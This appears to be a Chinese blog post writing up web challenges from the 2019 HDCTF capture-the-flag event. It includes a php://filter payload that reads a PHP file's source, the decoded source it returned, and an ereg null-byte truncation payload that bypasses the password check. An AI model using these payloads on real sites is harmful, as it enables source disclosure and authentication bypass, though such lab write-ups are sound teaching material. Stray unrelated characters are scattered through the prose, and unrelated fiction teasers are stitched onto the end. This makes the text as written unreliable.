2019-05-18 HDCTF

WEB

簽到題

打開題目


image.png

0改成1


image.png

查看源碼啊胶,有flag

測試你與flag的緣分

題目


image.png

打開flag.txt 甸各,一段js密碼,解密是一串base16焰坪,再解是qp趣倾,最后,假的密碼
回到題目某饰,查看源碼儒恋,發(fā)現(xiàn)一段base16


image.png

解密善绎,解出來是base64,解兩次诫尽,flag

簡單的代碼審計

打開題目一片空白,查看源碼


image.png
image.png

題目是代碼審計禀酱,php偽協(xié)議,

file=php://filter/read=convert.base64-encode/resource=once.php
image.png

出來一串base64

PGh0bWw+PGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1HQksiPg0KCTx0aXRsZT5PbmNlIE1vcmU8L3RpdGxlPg0KPC9oZWFkPg0KPGJvZHk+PGJyPg0KPGNlbnRlcj4NCjxwPllvdSBwYXNzd29yZCBtdXN0IGJlIGFscGhhbnVtZXJpYzwvcD48YnI+DQo8Zm9ybSBtZXRob2Q9ImdldCI+DQoJPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBhc3N3b3JkIiBwbGFjZWhvbGRlcj0iUGFzc3dvcmQiPjxicj48YnI+DQoJPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkNoZWNrIj4NCjwvZm9ybT4NCjxocj48YnI+DQo8L2JvZHk+PC9odG1sPg0KPD9waHANCmVycm9yX3JlcG9ydGluZygwKTsgDQppbmNsdWRlX29uY2UoJy4vZmxhZy9mbGFnMC5waHAnKTsNCmlmIChpc3NldCAoJF9HRVRbJ3Bhc3N3b3JkJ10pKSB7DQoJaWYgKGVyZWcgKCJeW2EtekEtWjAtOV0rJCIsICRfR0VUWydwYXNzd29yZCddKSA9PT0gRkFMU0UpDQoJew0KCQllY2hvICc8cD5Zb3UgcGFzc3dvcmQgbXVzdCBiZSBhbHBoYW51bWVyaWM8L3A+JzsNCgl9DQoJZWxzZSBpZiAoc3RybGVuKCRfR0VUWydwYXNzd29yZCddKSA8IDggJiYgJF9HRVRbJ3Bhc3N3b3JkJ10gPiA5OTk5OTk5OTkpDQoJew0KCQlpZiAoc3RycG9zICgkX0dFVFsncGFzc3dvcmQnXSwgJyotKicpICE9PSBGQUxTRSkNCgkJew0KCQkJZGllKCdGbGFnOiAnIC4gJGZsYWcpOw0KCQl9DQoJCWVsc2UNCgkJew0KCQkJZWNobygnPHA+Ki0qIGhhdmUgbm90IGJlZW4gZm91bmQ8L3A+Jyk7DQoJCX0NCgl9DQoJZWxzZQ0KCXsNCgkJZWNobyAnPHA+SW52YWxpZCBwYXNzd29yZDwvcD4nOw0KCX0NCn0NCj8+DQo=

base 64解密出來

<html><head>
<meta http-equiv="content-type" content="text/html; charset=GBK">
    <title>Once More</title>
</head>
<body><br>
<center>
<p>You password must be alphanumeric</p><br>
<form method="get">
    <input type="text" name="password" placeholder="Password"><br><br>
    <input type="submit" value="Check">
</form>
<hr><br>
</body></html>
<?php
error_reporting(0); 
include_once('./flag/flag0.php');
if (isset ($_GET['password'])) {
    if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
    {
        echo '<p>You password must be alphanumeric</p>';
    }
    else if (strlen($_GET['password']) < 8 && $_GET['password'] > 999999999)
    {
        if (strpos ($_GET['password'], '*-*') !== FALSE)
        {
            die('Flag: ' . $flag);
        }
        else
        {
            echo('<p>*-* have not been found</p>');
        }
    }
    else
    {
        echo '<p>Invalid password</p>';
    }
}
?>

ereg():輸入的password必須是大小寫字母和數(shù)字
strlen():輸入值必須大于999999999并且長度小于8
strops():輸入的值中必須含有 * - *
利用ereg函數(shù)的截斷漏洞可以構(gòu)造playload:1e9%00-
得到flag

image.png

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末牧嫉,一起剝皮案震驚了整個濱河市剂跟,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌酣藻,老刑警劉巖曹洽,帶你破解...
    沈念sama閱讀 217,657評論 6 505
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異辽剧,居然都是意外死亡送淆,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,889評論 3 394
  • 文/潘曉璐 我一進店門怕轿,熙熙樓的掌柜王于貴愁眉苦臉地迎上來偷崩,“玉大人,你說我怎么就攤上這事撞羽』吩洌” “怎么了?”我有些...
    開封第一講書人閱讀 164,057評論 0 354
  • 文/不壞的土叔 我叫張陵放吩,是天一觀的道長智听。 經(jīng)常有香客問我,道長渡紫,這世上最難降的妖魔是什么到推? 我笑而不...
    開封第一講書人閱讀 58,509評論 1 293
  • 正文 為了忘掉前任,我火速辦了婚禮惕澎,結(jié)果婚禮上莉测,老公的妹妹穿的比我還像新娘。我一直安慰自己唧喉,他們只是感情好捣卤,可當我...
    茶點故事閱讀 67,562評論 6 392
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著八孝,像睡著了一般董朝。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上干跛,一...
    開封第一講書人閱讀 51,443評論 1 302
  • 那天子姜,我揣著相機與錄音,去河邊找鬼楼入。 笑死哥捕,一個胖子當著我的面吹牛牧抽,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播遥赚,決...
    沈念sama閱讀 40,251評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼扬舒,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了凫佛?” 一聲冷哼從身側(cè)響起讲坎,我...
    開封第一講書人閱讀 39,129評論 0 276
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎御蒲,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體诊赊,經(jīng)...
    沈念sama閱讀 45,561評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡厚满,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,779評論 3 335
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了碧磅。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片碘箍。...
    茶點故事閱讀 39,902評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖鲸郊,靈堂內(nèi)的尸體忽然破棺而出丰榴,到底是詐尸還是另有隱情,我是刑警寧澤秆撮,帶...
    沈念sama閱讀 35,621評論 5 345
  • 正文 年R本政府宣布四濒,位于F島的核電站,受9級特大地震影響职辨,放射性物質(zhì)發(fā)生泄漏盗蟆。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,220評論 3 328
  • 文/蒙蒙 一舒裤、第九天 我趴在偏房一處隱蔽的房頂上張望喳资。 院中可真熱鬧,春花似錦腾供、人聲如沸仆邓。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,838評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至即碗,卻和暖如春榜聂,著一層夾襖步出監(jiān)牢的瞬間察署,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,971評論 1 269
  • 我被黑心中介騙來泰國打工峻汉, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留贴汪,地道東北人脐往。 一個月前我還...
    沈念sama閱讀 48,025評論 2 370
  • 正文 我出身青樓,卻偏偏與公主長得像扳埂,于是被迫代替她去往敵國和親业簿。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 44,843評論 2 354

推薦閱讀更多精彩內(nèi)容